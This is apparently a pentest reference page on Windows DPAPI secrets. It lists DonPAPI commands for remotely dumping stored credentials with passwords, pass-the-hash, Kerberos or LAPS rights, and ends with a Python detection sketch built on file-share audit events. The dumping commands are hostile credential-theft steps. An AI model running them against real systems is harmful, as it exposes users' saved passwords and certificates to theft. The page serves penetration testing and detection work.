
# DPAPI secrets

## Overview

Windows uses DPAPI (the Data Protection API) to store sensitive data for various applications, such as Outlook, web browsers and more. Windows also uses DPAPI to store certificates, Wi-Fi credentials, etc.

DPAPI data is secured by a user-specific master key, which is stored within the user's profile directory:

`C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>`

## Remotely Dumping

DPAPI secrets can be dumped **remotely** using DonPAPI. However, a user's password is required.

* <https://github.com/login-securite/DonPAPI>

**Dump all secrets using a domain administrator account (requires local administrator):**

```
DonPAPI <domain>/<user>:<password>@<target>
```

**Dump all secrets using a local administrator account:**

```
DonPAPI -local_auth <user>@<target>
```

**Dump secrets using a user's password hash (Pass-The-Hash attack):**

```
DonPAPI --hashes <LM>:<NT> <domain>/<user>@<target>
```

**Dump secrets using Kerberos:**

```
DonPAPI -k <domain>/<user>@<target>
```

**Dump secrets using a user with LAPS password reading rights:**

```
DonPAPI -laps <domain>/<user>:<password>@<target>
```
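
On the defensive side, reads of master key files in the `Protect` directory over an administrative share can be logged as Security event 5145 when Detailed File Share auditing is enabled. The following detection sketch is an added example, not part of the original page or of DonPAPI; the sample events, account names, SID and the heuristic that the profile folder name equals the account name are constructed assumptions.

```python
import re
from collections import defaultdict

# Master key files: Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>
MASTERKEY_RE = re.compile(
    r"(?i)(?:^|\\)Users\\(?P<profile>[^\\]+)\\AppData\\Roaming\\Microsoft\\Protect"
    r"\\(?P<sid>S-1-5-21(?:-\d+)+)"
    r"\\(?P<guid>[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})$")
ADMIN_SHARES = {r"\\*\C$", r"\\*\ADMIN$"}  # ShareName format used by event 5145

def remote_masterkey_reads(events):
    """Group 5145 events touching master key files by (source IP, account)."""
    hits = defaultdict(lambda: {"profiles": set(), "keys": set()})
    for ev in events:
        if ev.get("EventID") != 5145:
            continue
        if ev.get("ShareName", "").upper() not in ADMIN_SHARES:
            continue
        m = MASTERKEY_RE.search(ev.get("RelativeTargetName", ""))
        if m:
            entry = hits[(ev["IpAddress"], ev["SubjectUserName"].lower())]
            entry["profiles"].add(m["profile"].lower())
            entry["keys"].add(m["guid"].lower())
    return dict(hits)

def alerts(events, min_profiles=2):
    """Flag sessions reading another user's master keys, or keys of several profiles."""
    out = []
    for (ip, account), e in sorted(remote_masterkey_reads(events).items()):
        # Assumption: profile folder name == account name (not true for alice.DOMAIN etc.)
        if e["profiles"] - {account} or len(e["profiles"]) >= min_profiles:
            out.append({"source": ip, "account": account,
                        "profiles": sorted(e["profiles"]), "masterkeys": len(e["keys"])})
    return out

# Constructed sample events, already parsed into dicts; one made-up SID reused for brevity.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1104"
def _ev(ip, account, share, *parts):
    return {"EventID": 5145, "IpAddress": ip, "SubjectUserName": account,
            "ShareName": share, "RelativeTargetName": "\\".join(parts)}
def _key(profile, guid):
    return ("Users", profile, "AppData", "Roaming", "Microsoft", "Protect", SID, guid)

SAMPLE = [
    _ev("10.0.0.50", "svc_admin", r"\\*\C$", *_key("alice", "0f3c9a1e-5b7d-4c2a-9e1f-aabbccddeeff")),
    _ev("10.0.0.50", "svc_admin", r"\\*\C$", *_key("bob", "11111111-2222-3333-4444-555555555555")),
    _ev("10.0.0.7", "alice", r"\\*\C$", *_key("alice", "0f3c9a1e-5b7d-4c2a-9e1f-aabbccddeeff")),
    _ev("10.0.0.9", "carol", r"\\*\C$", "Users", "carol", "Documents", "report.docx"),
    _ev("10.0.0.9", "carol", r"\\*\SYSVOL", *_key("bob", "11111111-2222-3333-4444-555555555555")),
]
```

Calling `alerts(SAMPLE)` flags only the `svc_admin` session from `10.0.0.50`, which touched master keys in two other users' profiles; a user reading their own key and unrelated file access are ignored.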
